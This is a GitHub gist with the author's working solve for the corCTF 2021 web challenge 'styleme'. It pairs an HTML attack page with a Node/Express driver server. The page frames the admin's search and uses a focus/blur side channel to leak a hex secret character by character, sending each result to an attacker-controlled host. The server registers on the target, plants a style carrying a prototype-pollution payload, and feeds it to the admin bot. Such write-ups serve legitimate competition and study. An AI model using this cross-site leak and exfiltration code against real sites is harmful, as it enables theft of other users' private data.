Skip to content

Instantly share code, notes, and snippets.

@strellic
Last active August 28, 2021 00:32
Show Gist options
  • Save strellic/efe0e7a78461c20abe01805b8e9393e7 to your computer and use it in GitHub Desktop.
Save strellic/efe0e7a78461c20abe01805b8e9393e7 to your computer and use it in GitHub Desktop.
corCTF 2021 web/styleme solve
<!DOCTYPE html>
<html>
<body onblur="nop()">
<h1>styleme solver</h1>
<input type="text" id="focusforcer" /><br />
<script>
let $ = document.querySelector.bind(document);
let yep = false;
let done = false;
let known = "{{known}}";
let index = 0;
let alphabet = "{{alphabet}}";
const send = (data) => {
fetch("{{host}}/log?info=" + data);
}
const reset = () => {
$("#focusforcer").focus();
return new Promise((r) => setTimeout(r, 50));
};
function nop() {
yep = true;
}
const run = async () => {
await reset();
console.log("run", known, alphabet);
yep = false;
let c = alphabet.charAt(index);
if(!c) {
send("finished");
return;
}
index++;
let query = known + c;
let frame = document.createElement("iframe");
frame.src = "http://localhost/styles/search?user=admin&query=" + query + "&sdf=" + location.href;
frame.style.width = "800px";
frame.style.height = "600px";
frame.onload = () => {
setTimeout(() => {
frame.src += "#back";
}, 200);
setTimeout(() => {
if(yep) {
send(`success_${query}`);
return;
}
else {
send(`fail_${query}`);
}
frame.remove();
run()
}, 400);
};
document.body.appendChild(frame);
};
run();
</script>
</body>
</html>
const express = require("express");
const nodeFetch = require("node-fetch");
const fetch = require('fetch-cookie')(nodeFetch);
const app = express();
const PORT = 80;
const HOST = "http://ngrok";
const TARGET = "https://styleme.be.ax";
let account = ["strellicsolve", "passwd"];
let id = "";
let known = "";
let alphabet = "0123456789abcdef";
let last = 0;
app.set("view engine", "hbs");
app.use((req, res, next) => {
res.locals.host = HOST;
res.locals.known = known;
res.locals.alphabet = alphabet;
console.log(req.originalUrl, res.locals.known, res.locals.alphabet);
next();
});
app.get("/log", (req, res) => {
if(req.query.info) {
let info = `${req.query.info}`;
console.log(info);
if(info === "finished" && known.length !== 12) {
alphabet = "0123456789abcdef";
known = known.slice(0, -1);
}
else if(info.startsWith("fail_") && alphabet.startsWith(info.charAt(info.length - 1))) {
let c = info.charAt(info.length - 1);
alphabet = alphabet.replace(c, "");
}
else if(info.startsWith("success_") && alphabet.startsWith(info.charAt(info.length - 1))) {
let c = info.charAt(info.length - 1);
known += c;
alphabet = "0123456789abcdef";
}
}
res.end("recv");
});
app.get("/", (req, res) => res.render("pwn"));
let regex = /<a href="\/styles\/i\/(.*?)" class="btn btn-primary btn-sm">Install<\/a>/;
const start = async () => {
await fetch(`${TARGET}/api/register`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: `user=${encodeURIComponent(account[0])}&pass=${encodeURIComponent(account[1])}`
});
await fetch(`${TARGET}/api/login`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: `user=${encodeURIComponent(account[0])}&pass=${encodeURIComponent(account[1])}`
});
if(!id) {
let title = encodeURIComponent('yep payload');
let css = encodeURIComponent('h5 + a#back { display: none }');
let url = encodeURIComponent(HOST + `?\n__proto__: {"\\u0067lobal": 1}`);
await fetch(`${TARGET}/api/create`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: `title=${title}&css=${css}&url=${url}&hidden=yep`
});
let r = await fetch(`${TARGET}/styles/mine`);
let text = await r.text();
console.log(text);
id = regex.exec(text)[1];
console.log(`generated payload id: ${id}`);
}
pwn();
};
const pwn = async () => {
while(true) {
if(known.length === 12) {
console.log("ding ding ding ding");
console.log(known, known, known, known, known);
break;
}
if(new Date() - last >= 20*1000) {
console.log("sending a new payload!!!");
last = new Date();
await fetch(`${TARGET}/api/submit`, {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: `url=${encodeURIComponent(`${TARGET}/styles/i/${id}`)}`
});
}
await new Promise((resolve, reject) => setTimeout(resolve, 1000));
}
};
app.listen(PORT, () => {
console.log(`listening on port ${PORT}`);
start();
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment